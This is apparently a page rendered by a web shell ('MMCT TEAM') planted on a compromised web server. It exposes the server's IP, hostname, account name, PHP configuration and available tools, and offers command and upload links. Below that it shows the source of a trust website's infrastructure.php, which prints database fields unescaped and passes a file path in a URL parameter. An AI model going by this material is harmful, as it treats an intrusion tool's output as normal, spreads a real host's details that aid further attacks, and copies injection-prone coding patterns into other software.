MMCT TEAM
Server IP : 103.191.208.50  /  Your IP : 216.73.216.53
Web Server : LiteSpeed
System : Linux orion.herosite.pro 4.18.0-553.53.1.lve.el8.x86_64 #1 SMP Wed May 28 17:01:02 UTC 2025 x86_64
User : celkcksm ( 1031)
PHP Version : 7.4.33
Disable Function : show_source, system, shell_exec, passthru, popen, exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home/celkcksm/bmtrust.org.in/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/celkcksm/bmtrust.org.in/infrastructure.php
<?php include("include/header.php");
?>
	<div class="cbp-row wh-content">
		<div class="cbp-container">
			<div class="three fourths wh-padding wh-content-inner">
			    <h4>Infrastructure</h4>
			    <?php
			        $query=mysqli_query($con,"select * from infrastructure order by id desc");
			        while($row=mysqli_fetch_assoc($query)){
			            $doc=$row['pdf'];
			    ?>
			    <div class="vc_col-md-12" style="margin-top:30px;">
			      
			       <a href="detailsView.php?name=<?=$row['session'];?>&fileName=admin/images/<?php echo $doc; ?>" style="border:1px solid orange;padding:10px 50px;">
        			        <?=$row['session'];?>
    			       </a>
    			    
			    </div>
			    <?php
			        }
		        ?>
			</div>
			<div class="wh-sidebar one fourth wh-padding">
				<div class="widget recent-posts-4 widget_recent_entries">
					<h5 class="widget-title">Recent News</h5>
					<ul>
					    <?php
					        $newsQ=mysqli_query($con,"select * from news order by id desc limit 5");
					        while($newsR=mysqli_fetch_assoc($newsQ)){
					    ?>
						<li>
							<a href="news.php?csrf=<?=$newsR['id'];?>"><?=$newsR['subject'];?></a>
						</li>
						<?php
						    }
						?>
					</ul>
				</div>
			</div>
		</div>
	</div>
<?php include("include/footer.php");?>

MMCT - 2023